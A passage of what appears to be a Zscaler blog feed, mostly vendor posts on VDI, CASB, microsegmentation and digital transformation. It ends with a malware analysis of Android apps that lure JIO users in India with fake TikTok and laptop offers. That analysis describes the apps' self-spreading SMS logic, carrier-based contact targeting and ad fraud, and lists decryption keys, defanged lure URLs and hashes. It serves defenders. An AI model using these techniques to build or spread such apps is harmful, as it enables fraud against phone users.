Just, no. Well, maybe chocolate mole sauce?) Analogously, VDI replacement makes sense in some ZPA scenarios, but doesn’t in others. The answer lies in understanding why you use VDI in the first place. Do your current use cases and applications really still require VDI? Do all users use VDI or just a subset? Asking why and exploring the scope can help to move beyond the assumptions that flow from the traditional on-premise / on-network mindset. Generally, organizations leverage VDI for one or more of the following reasons: Access granularity: Restricting users to only authorized applications Data residency restrictions: Ensuring data a) stays within the corporate boundary, and/or b) is never stored on the end-user’s device Traffic localization: Minimizing latency for heavyweight client-server interactions (e.g., database calls) Desktop management or reduction: Maintaining a clean desktop experience and ensuring a persistent desktop that users can access from multiple devices Software license reduction: Deploying software to a limited pool of virtual desktops, rather than all user devices Legacy application support: Enabling access to applications that require older OSes Traffic inspection: Using VDI to force all traffic through on-premise security stacks If you’re considering option #1, ZPA can replace VDI and provide granular, least-privilege access for authorized users to specific applications. In addition, deploying ZPA with Private Service Edge can address option #2a, ensuring that both the control plane and data plane stay entirely within your security boundary for private traffic. (And Zscaler’s upcoming integration of Cloud Browser Isolation with ZPA will start to address option #2b, as well.) For all of the other options, you can add Zscaler to your existing VDI environment to augment the benefits described above. 
Whether your VDI environment is on-premise (e.g., Citrix XenDesktop, VMware Horizon) or Desktop-as-a-Service (e.g., Amazon WorkSpaces, Windows Virtual Desktop), Zscaler lets you layer granular, cloud-native zero trust access over virtual desktop offerings. In this great-tastes-that-go-better-together scenario, Zscaler provides centralized visibility and control for users accessing resources from VDI environments. Installing the Zscaler Client Connector on virtual desktop instances gives visibility and centralized control over what the user can access from there. We have real-world examples of Zscaler customers deploying Zscaler Client Connector in their DaaS environments to protect external and SaaS traffic, via Zscaler Internet Access (ZIA), as well as traffic to private applications via Zscaler Private Access (ZPA). This combined solution offers many benefits: centralized visibility and control, single access control policy config for VDI as well as other forms of access, and consistent user experience—with the caveat that you must have dedicated single-user VDI instances (i.e., what Amazon calls Windows BYOL). An example where this approach makes sense is enabling employees to access private applications directly from their own devices, while restricting third parties to VDI-only access. You can extend ZPA’s centralized visibility and control to both user communities, as illustrated below in Figure 1. Figure 1. How ZPA complements VDI deployments. Even if we don’t replace VDI for all users, often we find that there are many user communities we can serve more simply with ZPA. For financial advisors and insurance agents, many firms have moved to web-based apps (DocuSign, etc.). So there may no longer be a hard requirement for those thousands of users to have VDI. This often requires going beyond the boundaries of the network and security teams and engaging enterprise architects, application owners, etc. 
ZPA and VDI go great together Replacing or augmenting VDI with ZPA requires a deeper understanding of why you use VDI, and whether it is still a necessary part of your environment. Often, Zscaler’s Zero Trust Exchange can remove the necessity for VDI by providing direct access to internal and cloud apps, even if the user is accessing from outside the perimeter. Dig into your assumptions. Replace where you can, combine where it makes more sense. And let me know if you think mole sauce goes well with spring rolls. For additional resources, please visit our Work-from-Anywhere Content Hub. Thu, 15 Apr 2021 08:00:01 -0700 Lisa Lorenzin Join Us Live: Seize the Zero Trust Moment. Accelerate digital transformation with confidence. Join Zscaler for Seize the Zero Trust Moment: a virtual broadcast covering the latest Zscaler innovations, how to implement and leverage zero trust to improve business agility, and personal accounts and stories of digital transformation success. Reserve your spot today. Digital transformation is so much more than migrating a few applications to the cloud, and it’s largely reliant on the Internet as the new corporate network. The benefits of transformation make enterprises more agile, efficient, and modern—but can also make them more vulnerable to attacks if the proper security isn’t in place. Zscaler has helped thousands of customers securely enable their digital transformation through a true zero trust architecture, the Zscaler Zero Trust Exchange. Powered by the world’s largest security cloud, our customers leverage zero trust to securely connect users and applications, prevent data loss, increase visibility into threats, and keep the cloud safe—for all. So, with that in mind, we invite you to our upcoming global broadcast, Seize the Zero Trust Moment. The latest in cloud security will be unveiled. Join us to learn how the latest Zscaler innovations will enable you to accelerate business transformation by embracing zero trust.
This broadcast will introduce the technologies, tools, and resources required to protect your business as you embark on your digital journey, including: Taking zero trust to a new level The new normal will be a hybrid workforce, with users working both inside and outside the office more than ever. Zero trust services must be designed to secure this new world, and ensure zero trust for all. A safer world With the internet as the new corporate network, threat actors are devising new ways of stealing data each day. Join us to see how we’re helping customers protect their data. Security doesn’t have to be hard One of the biggest challenges IT security leaders have is that security can be complicated, especially with legacy point products. During our broadcast, we'll dive into how Zscaler aims to make life easier for IT. Hear from some of the world’s top digital transformation experts. We've put together a stellar lineup of IT and security leaders. They will explain how zero trust addresses new business challenges and how Zscaler has helped customers—all with the Zscaler Zero Trust Exchange. Elevating IT together. A security strategy is only as strong as the people driving it and the ecosystem that enables it. To that end, Seize the Zero Trust Moment will help elevate the role of IT leaders and executives and empower practitioners through industry-first initiatives. We’ll highlight some of the work being done with some of the world’s most popular security vendors as well. Join us from around the globe. With organizations moving out of the data center and into the cloud at record rates, now’s the time for a fundamental shift in how business is done, and how it’s secured.
In light of this, we’re bringing this event to every corner of the globe—in three time-zone-friendly sessions: AMERICAS: Tuesday, April 20, 11 AM – 12 PM PT | 2 PM - 3 PM ET APAC: Wednesday, April 21, 10 AM - 11 AM IST | 12:30 PM - 1:30 PM SGT EMEA: Thursday, April 22, 10 AM - 11 AM BST | 11 AM - 12 PM CEST Reserve your spot. When you’re seeking to accelerate digital transformation, it can be difficult to know where to start—but we’re here to show you how you can do it confidently, starting with zero trust. Reserve your spot at Zscaler’s Seize the Zero Trust Moment virtual broadcast. Mon, 12 Apr 2021 14:16:17 -0700 Christopher Hines Let's Talk CASB: The Data Protection Dialogues For a more in-depth look into what it takes to build a comprehensive data protection and security strategy, be sure to check out our new video series, Data Protection Dialogues. Like most progressive companies, you've probably got CASB on your shopping list. Cloud applications have changed everything. Your sensitive data has left yesterday's on-prem networks and is now distributed everywhere, with your users accessing this sensitive information from anywhere but the office. You need more control over your data than ever before; however, legacy, network-centric security tools offer little to none. So, naturally, CASB seems like an easy next step, right? At first, this seems true—especially if you've just started migrating your applications to the public cloud and have been previously relying on more network-centric solutions—because you do obtain more control over your data than before with CASB. However. Most organizations see CASB at surface value—more control, and more control is good—and fail to realize that it's only a fraction of an enterprise's complete data loss prevention (DLP) plan. As you can see, upgrading your data protection strategy takes a whole lot more than just buying a few point products.
So, with that in mind, Zscaler CISO Mark Lueck and VP of Product Management Moinul Khan have joined me in creating a new video series, Data Protection Dialogues. In these videos, we talk about all things data and how your organization can protect it. In our first episode, we chat about CASB and how it's just a part of a larger data protection strategy. We also discuss why CASB is so hot right now, how CASB converges with SWG and DLP, and practical advice for formulating a foolproof CASB strategy. But our first episode doesn't stop there. We even address the challenges of securing a remote workforce and enabling secure BYOD access. You can watch this episode on-demand here. What’s new in the world of data protection? For a closer look at solving some challenges you are probably facing right now, with apps and data distributed across clouds, as well as CASB’s role in your data protection strategy, be sure to check out our latest video series, Data Protection Dialogues. Wed, 14 Apr 2021 08:00:01 -0700 Steve Grossenbacher Taking the Micromanagement out of Microsegmentation Enterprise security teams have long been looking for more effective solutions to protect their cloud and data center environments. Once secured solely by perimeter-based technologies, today’s network environments are decidedly past the point of relying on controls at the edges. Out of this need to protect internal communication and east-west traffic arose the adaptation of traditional controls. Firewalls were moved inside the network to create microperimeters. The idea was that one great big “fence” around the outside of the network wasn’t enough, but using the same tools and techniques, enterprise security practitioners could create smaller “secure zones” within the network. Doing so would effectively limit how far network traffic could travel before needing to pass a security “checkpoint.” The concept was simple. Implementation was not.
The idea of microsegmentation—firewall rule-based microperimeters—caught on with security practitioners in a big way. Any practitioner worth their salt knows that flat networks mean trouble. Actually implementing microsegmentation, however, often proves more troublesome than it’s worth. While there is something to be said for “limiting the blast radius” of an internal breach or malware, the cost and people hours required to properly microsegment a network in the traditional sense often don’t support the limited benefits. Challenges with traditional microsegmentation Translating app speak to network speak One of the main problems with traditional microsegmentation projects is translating application speak (how applications function and communicate) into network speak (how networks send/receive data) so that security controls (based on network constructs) function. This is no small task; in today’s cloud and container environments, address-based information is unreliable as a security control since development teams can spin up or spin down an application or service in a matter of hours, changing the source data (e.g., IP address, port, or protocol) for the control decision. IP address spoofing Furthermore, address spoofing is a relatively trivial task for even a moderately skilled script kiddie. Attackers can hide in approved network traffic and the security team would be none the wiser. Piggybacking on an approved IP address using approved protocols, attackers can move laterally across segments or subnets to their ultimate targets (generally data or applications) and remain undetected. Application dependencies and policy compression In today’s app-centric networks (whether on-premises or in the cloud), application dependencies are highly complex. Traditional microsegmentation requires security teams to understand access control lists, routing rules, and firewall rules.
Changes to any one of these things could break functionality on a business-critical application and cause a major disruption that the security team now has to defend. As a result, to facilitate microsegmentation, many security organizations end up building thousands of policies, but doing so renders management of these policies unwieldy. To reduce the number of policies, security teams need to remove the fine-grained controls that make proper segmentation worthwhile. A new kind of microsegmentation Whatever microsegmentation is or isn’t, preventing lateral movement and malware propagation on the network is critical to protecting organizations from cyber criminals. Security teams need manageable ways to create secure zones within their networks, gain visibility into data flows, and place fine-grained controls around data-rich applications and workflows. And they need a way to do it that delivers a return on their investment (ROI) from both a time and cost standpoint. Even if traditional microsegmentation were the most effective security control in the security professional’s toolbox (it’s not), the barriers to entry are just too high for anyone but the largest, best-resourced organizations. What is zero trust microsegmentation? Zero trust microsegmentation is a method of applying application-level security controls that enforce the strictest least-privileged authentication and authorization for applications and services communicating in the hybrid cloud. How is this different from traditional, network microsegmentation? Microsegmentation typically refers to segmentation based on network constructs — IP addresses, ports, and protocols. In other words, security controls are based on the environment as opposed to the applications or services attackers are trying to exploit. With Zscaler, security is abstracted away from the network environment. It doesn’t matter where your apps and services are running because the environment isn’t the issue. The data is. 
What are identity attributes? To alleviate the problem of compromised apps and services and malware propagation, Zscaler creates security policies that are tied to the cryptographic identity of the apps and services communicating on your networks. With Zscaler, the cryptographic identity (“fingerprint”) comprises 30 attributes, such as the SHA256 hash, UUID of the BIOS, file name, file path, product name, and version number. The basis for the fingerprint is what the software is, rather than where it’s coming from or going to. This results in policies that travel with the workload and won’t break if the environment changes. Software-based identity is the key to ensuring your workloads are malware resistant. Another factor in the efficacy of Zscaler zero trust microsegmentation is our unique value proposition: a system of symmetrical validation of communications. No application, service, or host is allowed to send or receive communication unless it is positively verified by its fingerprint — every time it tries to communicate, and on both ends of the connection. Collectively, Zscaler’s software-defined, application-level control, coupled with least-privileged access and required symmetrical verification, means that communications in your data center or cloud are fully protected against lateral movement and malware propagation. Simplification at its best As stated above, traditional microsegmentation is highly complex and unwieldy. Zero trust microsegmentation with Zscaler is simple: all policy recommendations are automatically generated based on the identity of your communicating software and can be applied (or removed) in one click. Users do not need to understand network traffic flows, and subnets do not need to be manually created. The fingerprints of your applications determine permissions, not network constructs. 
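The identity-based model described above can be sketched in a few lines of Python. This is a minimal illustration only, not Zscaler's implementation: the attribute names (binary_sha256, product, version) are hypothetical stand-ins for the roughly 30 real fingerprint attributes, and real enforcement happens at the connection layer, not in an in-memory set.

```python
import hashlib

def software_fingerprint(attrs: dict) -> str:
    """Derive a stable identity from software attributes (illustrative).

    Because network location (IP, port) is not an input, the identity
    survives a move to a new host or subnet; tampering with the binary
    changes the fingerprint and breaks the policy match.
    """
    canonical = "|".join(f"{k}={attrs[k]}" for k in sorted(attrs))
    return hashlib.sha256(canonical.encode()).hexdigest()

# Policy: the set of allowed (sender, receiver) fingerprint pairs.
ALLOWED_PAIRS = set()

def register_pair(sender_attrs: dict, receiver_attrs: dict) -> None:
    ALLOWED_PAIRS.add((software_fingerprint(sender_attrs),
                       software_fingerprint(receiver_attrs)))

def may_communicate(sender_attrs: dict, receiver_attrs: dict) -> bool:
    """Symmetric check: both endpoints are verified on every attempt."""
    pair = (software_fingerprint(sender_attrs),
            software_fingerprint(receiver_attrs))
    return pair in ALLOWED_PAIRS
```

Note that a workload keeps its fingerprint when it moves hosts (the environment isn't part of the identity), while a tampered binary, whose hash differs, is denied.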
Finally, all application paths are mapped and exposed automatically, which means that you always have full view into your application topology and can easily report point-in-time risk. It doesn’t get much simpler than that. Additional resources: Blog: How Microsegmentation Differs from Network Segmentation Blog: Microsegmentation is Foundational to Cloud Security: Don't Get Spoofed Datasheet: One-Click Zero Trust for Automated Microsegmentation (PDF) Thu, 08 Apr 2021 08:00:02 -0700 Nagraj Seshadri A Novel Concept: Enabling Companies To Do What They’re Supposed To Do. This post also appeared on LinkedIn. As an F500-company leader and former management consultant, I’ve spent much of my IT professional career adapting enterprise infrastructure to meet “digital transformation” challenges. I’ve come to question the term “digital transformation.” As a term of art, it isn’t particularly specific. It can mean different things to different people: Is digital transformation a change in security architecture? The adoption of SaaS applications? Moving infrastructure to the cloud? Enabling work from anywhere (WFA)? Converting an internally managed WAN to a Software-Defined WAN (SD-WAN)? Does it include customer engagement or user experience? For me, digital transformation can be any significant change to legacy architecture designed to improve the core competencies of supported business. In practice, “digital transformation” encompasses cloud migration, security transformation, cultural evolution, and — most importantly — IT’s transformation into an engine of business growth. It’s that last piece — IT’s transformation into a business-growth enablement engine — that represents the ultimate objective of digital transformation. For example, my previous company provided employment services to companies and applicants looking to connect, globally. 
We were not an IT software or hardware company, yet our top-notch IT team had to make a network run, build email servers, and develop the occasional CRM application. But we found that the attention paid to legacy infrastructure wasn’t the best use of IT resources. We achieved more — much more — when IT focused on how to leverage partners and services to achieve the goals of our company and customers. This became all the more apparent as the company grew both organically and through mergers and acquisitions (M&A). Digital transformation objective #1: Keep your head in the clouds “Digital transformation” typically involves the cloud. But what is a cloud-first solution? Is it moving assets to the cloud? Is it using the cloud as part of your infrastructure? Is it enabling working from anywhere? It’s all of those things, and more. The cloud element of digital transformation strategy is about decentralizing infrastructure and operations so that an enterprise can quickly adapt to take advantage of new technology to better realize goals. Cloud services can supplant the need for costly custom development, but only with perspective: Every discipline of IT should be challenged to answer the question, “Why are we building this service instead of buying it and delivering it to the business?” Digital transformation should enable core competencies. But building and managing services limits core competencies by contributing to technology debt that constrains future growth potential. Digital transformation objective #2: Secure the work without slowing performance Security concerns can complicate cloud adoption. Security teams must protect legacy networks in an environment of ongoing attacks, new exploits, data-exfiltration threats, evolving business models, and systems integration (often from M&A activity). The apparent control that legacy security models provide is attractive: Forcing data to flow through managed, centralized gates seems to provide oversight of access and traffic. 
Except that control is illusory, not to mention a performance bottleneck. The majority of employee work is now performed outside the purview of perimeter-based security visibility. The enterprise world has embraced a decentralized, cloud-first model of work, whether IT teams welcome it or not. When those IT teams try to secure cloud-first work with legacy infrastructure, performance falters, and users look to alternatives. Some bypass security for the sake of faster connectivity. Others create so-called “shadow IT” initiatives. This centralized security model adds little value to an enterprise. For example, IT teams need visibility into data traffic flows, application use, even data-center access. Legacy network infrastructure can slow data traffic by routing it to a faraway destination, but it can’t provide any of that needed visibility. Legacy stacks of heterogeneous, point-product networking and security equipment provide no consolidated way of determining this information quickly. (Try pulling a specific IP address and port from firewall access lists that are several years old.) So how do you begin “transforming” your network? Start with security. Move it to the cloud. Whether you recognize it or not, legacy security is holding you back. When you decouple security from centralized, hub-and-spoke network architectures, you open the entire network to change. Now you can build decentralized infrastructure that securely employs the internet as its delivery mechanism. The Zero Trust Network Access (ZTNA) architecture is built upon the fundamentals of zero trust: specifically, a default-deny security posture that minimizes trust issuance, automatically rejecting system access for unknown sources, both inside and outside the network. This architecture is typically distributed via a cloud service. To gain access to a ZTNA environment, users must meet specific requirements. 
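A minimal sketch of that default-deny posture, under a deliberately simplified attribute model (real ZTNA brokers evaluate much richer, continuously re-checked context; the policy values below are invented for illustration):

```python
def ztna_allow(request: dict, policies: list) -> bool:
    """Default-deny: grant access only if some policy explicitly
    matches every attribute of the request; anything unmatched,
    inside or outside the network, is rejected."""
    for policy in policies:
        if all(request.get(attr) in allowed
               for attr, allowed in policy.items()):
            return True
    return False  # no matching policy -> deny by default

policies = [
    # Hypothetical rule: finance users on managed, compliant devices
    # may reach the ERP app from approved locations.
    {"user_group": {"finance"},
     "device_posture": {"managed-compliant"},
     "location": {"US", "DE"},
     "application": {"erp"}},
]
```

The important property is the final `return False`: an empty or unknown request matches nothing and is denied, rather than falling through to an implicit allow as in many legacy ACLs.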
ZTNA offers true control: organizations can dictate, customize, and adjust access requirements based on specific needs and risk level. These requirements can be set at user, device, location, and application levels. Shifting to cloud-based security opens the enterprise system extensibility floodgates: Your network can now use cloud-based Wi-Fi controllers, phone systems, video-conferencing systems, collaboration platforms like Microsoft Teams, industry-specific SaaS, etc. The “black-box” legacy network mindset holds back progress: Legacy security costs too much, is difficult to administer, provides little in the way of flexibility, and worst of all, isn’t even that secure. Digital transformation to the cloud means that IT becomes the enterprise enabler of change, and a strategic partner in business process improvement. Digital transformation objective #3: Set the transformation stage within corporate culture Digital transformation requires both a corporate mandate and a cultural shift. Change can be hard: Many IT teams have a deeply ingrained attachment to centralized security infrastructure models. It’s what they know. It’s what they’re certified on. Many view cloud-first architectures with understandable apprehension. Meanwhile, CxOs listen to them, and don’t always have the technical perspective to choose one security paradigm over another. Successful enterprise digital transformation requires patient teaching and committed assurance: Educate leadership. CxOs need to understand what “cloud-first” means from a business perspective, not a technical one. When it comes to company leadership, position cloud-first as the means to achieve company goals and solve company issues. Case in point, the COVID-19 crisis. Legacy networks were for the most part unequipped to rapidly handle the needed changes to workforce models. Companies with flexible, cloud-first networks shifted quickly and with little disruption to productivity and budget. Assure IT. 
IT teams are on the hook for making company technology work. And you’re asking them to manage during a period of what seems to them dramatic change. They prefer the known to the unknown. To make digital transformation work, you’re going to have to convince them to move beyond their comfort zone. I worked for a company that pushed through a consolidation of infrastructure. The biggest roadblock was the culture within IT. IT stakeholders were used to supporting point products that they had spent their entire careers managing. They had a very confined view of what was possible. IT leaders needed to understand that their new role was helping the company consume services and deliver capabilities to the business, as opposed to building and managing them at a much lower infrastructure level. These leaders also needed to ensure that team members understood their role in the new “consuming services” model (vs. their role when building services). When IT becomes the business engine Once your IT team and executive teams are on board with moving away from legacy architectures, you can start building the cloud-first enterprise. You can start making IT a driver of new enterprise objectives. It’s a myth that you must sacrifice security for user experience. Once educated teams embrace the cloud, your teams can help generate revenue, protect data, reduce costs, and avoid unnecessary spend. Beyond that, you can now reassess all the delayed projects that have piled up on the service managers because they cost too much, couldn’t be done securely, or required unavailable resources. Instead of the department that says “no,” you can be the department that says “yes.” Wed, 07 Apr 2021 10:12:41 -0700 Dan Shelton Android apps targeting JIO users in India Introduction In March 2021, through the Zscaler cloud, we identified a few download requests for malicious Android applications that were hosted on sites crafted by the threat actor to social engineer users in India. 
This threat actor leverages the latest events and news related to India as a social engineering theme in order to lure users to download and install these malicious Android apps. We identified several GitHub accounts that are hosting malicious Android mobile apps (APK files) and web pages actively used in this campaign. One of the Android apps masquerades as the TikTok app. In 2020, the TikTok app was banned by the government of India. Attackers are leveraging that theme to lure users by misinforming them that TikTok is available in India again. Another instance we observed recently involved the threat actor leveraging a “Free Lenovo Laptop” scheme by the Indian government. In this blog, we will describe the complete infection chain and the timeline of this threat actor, highlighting how they have changed themes over time to distribute the malicious Android apps. Timeline Per our research, this threat actor has been active in the wild since as early as March 2020. We observed a pattern in their tactics, techniques, and procedures (TTPs). They leverage popular themes and current events in India and use them as a social engineering technique to lure users into downloading their application. The graphical timeline below shows the different themes used by the threat actor over time. Figure 1: Timeline showing different themes used by the threat actor Attack flow The attack infection chain begins with an SMS or WhatsApp message in which the user receives a shortened URL that ultimately redirects to a website hosted on Weebly and controlled by the attacker. The content of this site is crafted based on current events in India and used for social engineering. Figure 2: Attack flow In the original download request we observed in the Zscaler cloud, the user-agent string was WhatsApp/, which indicated to us that the user clicked the link in a WhatsApp message. 
As an example, in one of the instances, the shortened URL redirected the user to the website https://tiktokplus[.], which looks as shown in Figure 3. Shortened link: http://tiny[.]cc/Tiktok_pro URL: https://tiktokplus[.] GitHub download link: Figure 3 This webpage misinforms the user that the TikTok application is available again in India and lures them to download it. The actual APK file is hosted on an attacker-controlled GitHub account. GitHub account name: breakingnewsIndia GitHub download link: During our research on this threat actor, we also identified several more GitHub accounts; the complete list is available in the Indicators of Compromise (IOC) section. Figure 4 and Figure 5 show two more such GitHub accounts. Figure 4 Fivegcovert (5G Covert) Figure 5 The latest theme used by this threat actor is related to a “Free Lenovo laptop scheme by the Indian Government.” Shortened URL: hxxps://tiny[.]cc/Register-Laptop Final URL: hxxps://govlapp[.] MD5 hash of APK file: f9e5fac6a4873f0d74ae37b246692a40 Package name: com.jijaei.pikapinjan Figure 6 shows the website crafted and hosted by the attacker, which misinforms the user and lures them to download the APK file. Figure 6 Technical analysis For the technical analysis, we will look at the APK file with MD5 hash 5e0ac8784dae349cfa840cbef5bd3dfb Package name: heartrate.tracker.cameras Main activity: heartrate.tracker.cameras.MainActivity Important code sections are included below. // MainActivity MainActivity does nothing more than call datalaile.class // datalaile.class The datalaile.class performs the following operations: Checks if required permissions are granted. 
If permissions are not granted, requests them; if the user denies the permissions, shows a popup message stating “Need Permission to start app!!” and asks the user for permissions again Starts the malicious service from felavo.class when permissions are granted Displays a form for username and password input Performs validation on the entered username and proceeds with further operations Figure 7: Getting permissions and starting malicious service Username validation Although the username is expected to be a mobile number, per the error message, there is no explicit check for that. The app only checks whether the username is at least 4 characters long; otherwise, it displays a message asking the user to enter the correct number. Figure 8: Username validation If the check passes, the app shows a popup message to start TikTok, which, when clicked, calls sendmsg.class // sendmsg.class The sendmsg.class prompts the user to share the app 10 times on WhatsApp. There is no check to identify whether WhatsApp is installed. If WhatsApp is not installed, a toast message is shown (“WhatsApp not Installed”), but the counter still decrements. The shared message has the following content: “*Tiktok is back in India*\n\n*Enjoy Tiktok Videos again and also*\n*make Creative videos again with*\n*new Features.*\n\n*Tiktok is now Partner with Jio.*\n\n*NOTE : All users can use their old Id.*\n\n*Now Tiktok is only available on*\n*TiktokPro android app.*\n\n*Link:*” As we can see, the above message contains a shortened URL that lures the user into downloading this malicious app. Figure 9 shows the code flow for sharing the app on WhatsApp. Figure 9: Sharing app on WhatsApp Figure 10 shows the interface displayed by the app, which prompts the user to share it with their contacts through WhatsApp 10 times. 
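The two checks described above can be approximated in Python (reconstructed from the described behavior, not the decompiled source; names are illustrative):

```python
def validate_username(username: str) -> bool:
    """Approximates the app's check: despite the 'enter correct number'
    error message, only the length is validated, so any string of
    4+ characters passes as a 'mobile number'."""
    return len(username) >= 4

class ShareGate:
    """Approximates sendmsg.class: requires 10 shares before
    continuing, but the counter decrements even when WhatsApp
    is not installed."""
    def __init__(self) -> None:
        self.remaining = 10

    def share(self, whatsapp_installed: bool) -> str:
        self.remaining -= 1  # counts down regardless of the outcome
        return "shared" if whatsapp_installed else "WhatsApp not Installed"

    def unlocked(self) -> bool:
        return self.remaining <= 0
```

The sloppy length-only check and the counter that decrements on failure are typical of this kind of quickly assembled adware: the "validation" exists only to look plausible to the victim.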
Figure 10: Message shown to user to prompt sharing with contacts through WhatsApp After the app is shared 10 times on WhatsApp, the user is shown a congratulation message with a Continue button which, when clicked, calls clickendra.class // clickendra.class The clickendra.class asks the user to perform a few more steps to get started with the app, then displays some ads to the user, and finally shows a message that TikTok will start in 1 HOUR. Figure 11 below shows the final message displayed to the user. Figure 11: 1-HOUR app start message displayed to the user Display ads These apps are used by the threat actor to generate revenue by displaying interstitial advertisements to the user. Two software development kits (SDKs) are used for this purpose. If the app fails to retrieve advertisements using one SDK, it uses the next SDK as a failover mechanism. The two SDKs used in the app are AppLovin and StartApp. First, the AppLovin SDK is initialized and the context is set. In order to leverage the AppLovin SDK to display advertisements, a developer needs to use the SDK key obtained from the AppLovin interface. In the case of this app, we can find the SDK key configured in AndroidManifest.xml, as shown in Figure 12. Figure 12: AppLovin SDK key configured in AndroidManifest.xml file Before displaying the ads, a fake view is created for the user, which contains a fake text message and a fake progress bar on top of all the elements. After setting the fake view, a request to fetch the ads is sent. If the ad is received successfully, it is displayed and the fake progress bar is hidden; otherwise, a request to load the next ad is sent. If the next ad load request also fails, then the StartApp SDK is initialized to load the ads. If the StartApp SDK is also unable to receive an ad, then lastactivity.class is called. 
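The failover chain above reduces to "try each ad source in order." A sketch of that control flow (the loaders here are placeholders, not the real AppLovin or StartApp APIs):

```python
def load_ad(sdk_loaders):
    """Try each SDK loader in order and return the first ad fetched,
    or None to fall through (the app then calls lastactivity.class)."""
    for sdk_name, loader in sdk_loaders:
        ad = loader()          # returns an ad object, or None on failure
        if ad is not None:
            return sdk_name, ad
    return None
```

For example, `load_ad([("AppLovin", lambda: None), ("StartApp", lambda: "interstitial")])` falls through the failed AppLovin loader and returns the StartApp result.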
Figure 13 below shows the ad displayed to the user. Figure 13: Ad displayed to the user // lastactivity.class It changes the content view, initializes the StartApp SDK again, and creates a fake progress bar as before. If an ad is received, it is displayed to the user; otherwise, the message shown in Figure 11 above is displayed and no further activity takes place. // Inside the service felavo.class The main objective of the code implemented for the service is to spread the malware to more users. The service felavo.class performs the following operations: Initialization The decoy message used to spread the application is stored in encrypted form. In the initialization phase, the service configures the cryptographic context that is later used to decrypt the decoy message. Note: In some cases this is just leftover code that executes, but the decrypted decoy message is never used; instead, a hardcoded message is already configured in the function where the decrypted decoy message is supposed to be used. Among all the analysed samples, we found two cryptographic algorithms in use: 1. AES/CBC/NoPadding 128-bit Key: 9876543210wsxzaq 2. DESede Key: ThisIsSpartaThisIsSparta SMS-based spreading The spreading operation performed by the service is through SMS. Currently, the malware targets only the JIO customer base. Before sending the SMS to any number in the infected device’s contact list, the malware confirms that the operator is JIO. Methods of identification are explained under the Contacts Operator Identification section. SIM Identification SIM identification is done to determine the SIM slot to be used later for sending the SMS. To identify the SIM card, the following operations are performed: If the Android SDK version is >= 22 and the READ_PHONE_STATE permission is granted, fetch the SIM slot number and carrier name; otherwise, fetch the operator names corresponding to the SIM cards on the current device. 
Checks if the fetched information contains JIO, AIRTEL, IDEA, VODAFONE, or VI. If any of the above strings is present, checks and returns the SIM slot number; otherwise, returns the value “default”. Figure 14: Fetching SIM information Figure 15: Matching operator string Contacts Operator Identification As stated earlier, the targeted user base for the attacker is JIO users. The contact numbers in the user’s contact list are identified as JIO users in two steps. Note: Before identification, all the contacts are fetched, sanitized, processed into a specified format, and then saved in a list. Step 1: There is a hardcoded list of the first 4 digits of mobile numbers that are specific to JIO. All the retrieved contacts are checked against this list, and a separate list of identified contacts is created. Figure 16 below shows the code that takes the mobile number as input and checks the first 4 digits. Figure 16: Checks first 4 digits of the mobile number Step 2: The numbers that are not identified in the first step are identified by sending a network request to the URL “”, configured with all the required parameters. Identified contacts are again stored in a separate list. Figure 17 below shows the network request sent with the required parameters and the checks performed on the response data. Figure 17: Sending network request and checking response If the response code indicates success, it performs two checks: If the response data contains “NOT_SUBSCRIBED_USER”, the mobile number doesn’t belong to a JIO user If the response data contains the mobile number being identified, it is a registered JIO user Sending SMS The malware identifies the SIM slot to send the SMS from based on the value of the second parameter, which is the value obtained in the SIM identification section. Figure 18 below shows the code snippet responsible for sending SMS. Figure 18: Sending SMS Zscaler cloud sandbox report Figure 19 shows the Zscaler Cloud Sandbox successfully detecting this Android mobile-based threat. 
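Step 1 of the contact-filtering logic can be sketched as follows. The prefixes below are made-up placeholders; the real malware ships a much longer hardcoded list of JIO-specific 4-digit prefixes:

```python
# Hypothetical prefixes for illustration only.
JIO_PREFIXES = {"7000", "8999", "9131"}

def is_jio_by_prefix(mobile: str) -> bool:
    """Step 1: normalize to the 10-digit national number and check
    the first 4 digits against the hardcoded prefix list."""
    digits = "".join(ch for ch in mobile if ch.isdigit())[-10:]
    return digits[:4] in JIO_PREFIXES

def filter_jio(contacts):
    """Split contacts: prefix-matched numbers are targeted directly;
    the rest are deferred to the network lookup described in Step 2."""
    matched = [c for c in contacts if is_jio_by_prefix(c)]
    unresolved = [c for c in contacts if not is_jio_by_prefix(c)]
    return matched, unresolved
```

The two-step design (cheap local prefix match first, network lookup only for the remainder) keeps the malware's spreading traffic low and less conspicuous.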
Figure 19: Zscaler cloud sandbox report Summary of TTPs We can summarise the tactics, techniques, and procedures (TTPs) as follows: They use a URL-shortening service to create shortened URLs that are sent in messages during the spreading stage. Web pages are hosted on an attacker-controlled account. The actual APK file is hosted on a GitHub account registered by the attacker. The names of these accounts are chosen to look relevant to India or to themes popular in India. The AES/DES decryption keys in the code are reused by the threat actor. Users of the JIO mobile service provider in India are specifically targeted. Conclusion This threat actor stays up to date with the latest events in India and leverages them for social engineering. Users must exercise caution before downloading and installing Android applications from untrusted and third-party sources, even if the links are received from mutual contacts on their Android device. As seen in this attack, the malicious download links are sent through the user’s existing contact list. Apps such as TikTok must only be downloaded from official sources. The Zscaler ThreatLabZ team will continue to monitor this campaign, as well as others, to help keep our customers safe. 
MITRE ATT&CK table
T1406 (Obfuscated Files or Information): Strings inside the app are encrypted using AES or DES
T1432 (Access Contact List): Filters JIO contacts from the user’s contact list
T1475 (Deliver Malicious App via Other Means): Delivers the app via WhatsApp or SMS spam
T1444 (Masquerade as Legitimate Application): Created apps use legitimate-looking themes
T1582 (SMS Control): Sends SMS in the background
Indicators of Compromise
MD5 hashes
// Laptop Theme
f9e5fac6a4873f0d74ae37b246692a40
b9db0c60100099d860b9ef42e6b3903a
f1187f4d6135264e5002fcfdf43643e9
// PUBG Theme
ba4011653e604dd4dab34da5e71cbdb4
220f70660921b76e06da148bc2ace554
// Cricket Theme
68a4a08947524ce9da09017fc4309149
998b3d9f0e895d20be8668ac86958fd9
36dc28525e1e84a94d57b6050903ec4b
// Corona Theme
2cd7e237cbf99e483573c11a11db9223
// TikTok Theme
Note: This is the truncated MD5 list
5bf513f7fd5186eaa1be8fab370bd510
6a69e2810a361c4e58433cbf7d9d6a5a
73dc187df641640e541727b151a1112c
f6cb20a637717c13633940c5f3f1a06e
e3afb7ce2763b52f3a192f4278b12932
4cde87788d35305aa4973cca79b41e51
0d7e6b85961b0d517e68f9f6e33b557f
a07f658338aa7c0aa4f26dfe985d5ef6
595e51779d7dbd760f8a82f3b8041594
d14719a50b6e66e53100605529ece5d8
0b6643d94e40318c9aefbc0d5f1fc3b4
5157a53a086473b4c28f3c6d04ff6702
